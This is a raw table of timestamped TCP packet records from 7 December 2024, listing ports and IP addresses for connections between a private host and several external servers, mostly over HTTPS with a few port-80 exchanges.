Dec 7, 2024 10:51:38.683567047 CET	49790	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.741883039 CET	49790	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.741914034 CET	443	49790	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.741925001 CET	49790	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.741931915 CET	443	49790	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.747093916 CET	49796	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.747123957 CET	443	49796	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.747195005 CET	49796	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.747414112 CET	49796	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.747431040 CET	443	49796	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.830780983 CET	443	49792	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.830857992 CET	443	49792	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.830909967 CET	49792	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.831161976 CET	49792	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.831188917 CET	443	49792	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.831204891 CET	49792	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.831211090 CET	443	49792	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.832330942 CET	443	49793	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.832484007 CET	443	49793	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.832525015 CET	49793	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.832741022 CET	49793	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.832762003 CET	443	49793	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.832777023 CET	49793	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.832782984 CET	443	49793	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.834171057 CET	443	49791	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.834238052 CET	443	49791	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.834281921 CET	49791	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.834810972 CET	443	49794	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.834881067 CET	443	49794	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.834906101 CET	49797	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.834919930 CET	49794	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.834939003 CET	443	49797	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.835001945 CET	49797	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.835186958 CET	49791	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.835196018 CET	443	49791	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.835208893 CET	49791	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.835212946 CET	443	49791	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.835827112 CET	49798	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.835856915 CET	443	49798	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.835933924 CET	49798	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.836025000 CET	49794	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.836030960 CET	443	49794	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.836041927 CET	49794	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.836045980 CET	443	49794	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.836427927 CET	49797	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.836437941 CET	443	49797	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.838337898 CET	49799	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.838346004 CET	443	49799	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.838433981 CET	49799	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.838501930 CET	49798	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.838517904 CET	443	49798	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.838557005 CET	49800	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.838593006 CET	443	49800	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.838635921 CET	49800	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.838795900 CET	49800	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.838812113 CET	443	49800	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.838829994 CET	49799	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.838840961 CET	443	49799	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.463949919 CET	443	49796	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.464526892 CET	49796	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.464554071 CET	443	49796	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.465142965 CET	49796	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.465147018 CET	443	49796	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.551852942 CET	443	49797	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.552568913 CET	49797	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.552589893 CET	443	49797	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.553071022 CET	49797	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.553077936 CET	443	49797	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.555597067 CET	443	49798	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.555944920 CET	443	49800	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.555974960 CET	49798	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.555986881 CET	443	49798	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.556332111 CET	443	49799	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.556430101 CET	49798	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.556436062 CET	443	49798	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.556852102 CET	49800	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.556875944 CET	443	49800	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.557266951 CET	49800	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.557272911 CET	443	49800	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.557687998 CET	49799	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.557701111 CET	443	49799	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.558096886 CET	49799	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.558104038 CET	443	49799	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.898896933 CET	443	49796	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.898992062 CET	443	49796	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.899097919 CET	49796	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.899419069 CET	49796	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.899439096 CET	443	49796	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.899458885 CET	49796	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.899465084 CET	443	49796	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.903105021 CET	49802	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.903162003 CET	443	49802	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.903420925 CET	49802	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.903671980 CET	49802	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.903688908 CET	443	49802	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.987004995 CET	443	49797	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.987078905 CET	443	49797	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.987287045 CET	49797	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.987677097 CET	49797	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.987698078 CET	443	49797	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.987709999 CET	49797	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.987715960 CET	443	49797	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.990317106 CET	443	49800	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.990396023 CET	443	49800	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.990449905 CET	443	49798	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.990503073 CET	49800	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.990519047 CET	443	49798	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.990711927 CET	49798	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.991204023 CET	443	49799	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.991272926 CET	443	49799	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.991345882 CET	49799	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.991796970 CET	49803	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.991847992 CET	443	49803	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.991947889 CET	49803	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.992082119 CET	49800	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.992096901 CET	443	49800	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.993395090 CET	49803	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.993407965 CET	443	49803	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.993662119 CET	49798	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.993674040 CET	443	49798	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.993721962 CET	49798	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.993729115 CET	443	49798	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.994807005 CET	49799	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.994832039 CET	443	49799	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.994944096 CET	49799	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.994955063 CET	443	49799	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.997260094 CET	49804	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.997303963 CET	443	49804	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.997450113 CET	49804	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.998687983 CET	49805	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.998733044 CET	443	49805	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:40.998914957 CET	49805	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.999892950 CET	49806	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:40.999902964 CET	443	49806	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:41.000062943 CET	49806	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:41.000216007 CET	49804	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:41.000228882 CET	443	49804	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:41.000560045 CET	49805	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:41.000576973 CET	443	49805	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:41.000636101 CET	49806	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:41.000643969 CET	443	49806	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:41.305681944 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:41.305728912 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:41.306025028 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:41.306726933 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:41.306740046 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:42.433058023 CET	49763	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:42.433667898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:42.552756071 CET	80	49763	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:42.553395033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:42.553474903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:42.553778887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:42.619452953 CET	443	49802	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.620219946 CET	49802	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.620244980 CET	443	49802	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.620935917 CET	49802	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.620940924 CET	443	49802	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.673537016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:42.708797932 CET	443	49803	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.709559917 CET	49803	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.709594965 CET	443	49803	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.710319996 CET	49803	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.710325003 CET	443	49803	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.716095924 CET	443	49805	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.716623068 CET	443	49804	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.717474937 CET	49805	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.717505932 CET	443	49805	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.718116045 CET	49804	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.718122005 CET	49805	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.718132973 CET	443	49805	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.718138933 CET	443	49804	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.718194962 CET	443	49806	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.718514919 CET	49804	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.718518972 CET	443	49804	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.718760014 CET	49806	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.718765974 CET	443	49806	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:42.719132900 CET	49806	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:42.719136000 CET	443	49806	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.054536104 CET	443	49802	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.054600954 CET	443	49802	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.056178093 CET	49802	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.056178093 CET	49802	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.056205988 CET	49802	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.056217909 CET	443	49802	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.059743881 CET	49809	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.059770107 CET	443	49809	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.059988976 CET	49809	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.059988976 CET	49809	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.060010910 CET	443	49809	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.064110994 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:43.064155102 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:43.068296909 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:43.076122046 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:43.076139927 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:43.145210981 CET	443	49803	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.145288944 CET	443	49803	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.146184921 CET	49803	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.146184921 CET	49803	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.148825884 CET	49811	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.148828983 CET	49803	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.148864031 CET	443	49811	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.148865938 CET	443	49803	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.149280071 CET	49811	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.149280071 CET	49811	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.149312973 CET	443	49811	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.151915073 CET	443	49805	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.151976109 CET	443	49805	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.152105093 CET	49805	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.152304888 CET	49805	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.152319908 CET	443	49805	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.152343988 CET	49805	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.152349949 CET	443	49805	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.153419018 CET	443	49804	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.153471947 CET	443	49804	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.153959990 CET	49804	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.154056072 CET	443	49806	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.154133081 CET	443	49806	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.154282093 CET	49806	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.154335976 CET	49804	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.154335976 CET	49804	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.154350996 CET	443	49804	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.154361010 CET	443	49804	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.156946898 CET	49806	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.156946898 CET	49806	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.156954050 CET	49812	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.156955004 CET	443	49806	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.156965017 CET	443	49806	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.156977892 CET	443	49812	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.157054901 CET	49812	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.157874107 CET	49812	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.157882929 CET	443	49812	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.159331083 CET	49813	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.159352064 CET	443	49813	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.159502983 CET	49813	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.159502983 CET	49813	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.159527063 CET	443	49813	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.162091970 CET	49814	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.162102938 CET	443	49814	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.162699938 CET	49814	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.162775993 CET	49814	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:43.162782907 CET	443	49814	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:43.726954937 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:43.727296114 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:43.729135990 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:43.729145050 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:43.729398012 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:43.732753992 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:43.732753992 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:43.732773066 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:43.804786921 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:43.847343922 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:44.030185938 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:44.030229092 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:44.030303955 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:44.031050920 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:44.031066895 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:44.390253067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:44.390312910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:44.397255898 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:44.397694111 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:44.397797108 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:44.398035049 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:44.398051977 CET	443	49807	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:44.398150921 CET	49807	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:44.777223110 CET	443	49809	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.777957916 CET	49809	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.777986050 CET	443	49809	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.778584003 CET	49809	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.778592110 CET	443	49809	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.825784922 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:44.825862885 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:44.836384058 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:44.836416006 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:44.836793900 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:44.836842060 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:44.848834038 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:44.848893881 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:44.866236925 CET	443	49811	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.867086887 CET	49811	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.867120028 CET	443	49811	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.867808104 CET	49811	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.867818117 CET	443	49811	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.871637106 CET	443	49812	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.874015093 CET	443	49813	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.876277924 CET	49812	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.876307011 CET	443	49812	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.877027035 CET	49812	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.877041101 CET	443	49812	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.877607107 CET	49813	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.877634048 CET	443	49813	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.878031015 CET	49813	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.878036022 CET	443	49813	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.886559010 CET	443	49814	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.887675047 CET	49814	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.887710094 CET	443	49814	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:44.888170004 CET	49814	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:44.888184071 CET	443	49814	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.212143898 CET	443	49809	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.212203979 CET	443	49809	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.212467909 CET	49809	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.212507010 CET	49809	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.212507010 CET	49809	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.212521076 CET	443	49809	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.212529898 CET	443	49809	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.215681076 CET	49816	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.215723038 CET	443	49816	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.215850115 CET	49816	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.216243029 CET	49816	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.216253042 CET	443	49816	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.243906021 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:45.243927002 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:45.243994951 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:45.244002104 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:45.244003057 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:45.244106054 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:45.245842934 CET	49810	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:45.245862961 CET	443	49810	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:45.305392981 CET	443	49811	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.305464983 CET	443	49811	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.305747986 CET	49811	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.305747986 CET	49811	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.305783987 CET	49811	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.305802107 CET	443	49811	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.306046963 CET	443	49812	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.306113958 CET	443	49812	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.308296919 CET	49812	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.308305025 CET	443	49813	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.308378935 CET	443	49813	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.308412075 CET	49812	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.308429956 CET	443	49812	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.308449030 CET	49812	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.308451891 CET	49813	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.308455944 CET	443	49812	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.309287071 CET	49817	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.309323072 CET	443	49817	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.309392929 CET	49817	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.309448957 CET	49813	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.309448957 CET	49813	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.309468985 CET	443	49813	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.309479952 CET	443	49813	13.107.246.63	192.168.2.6
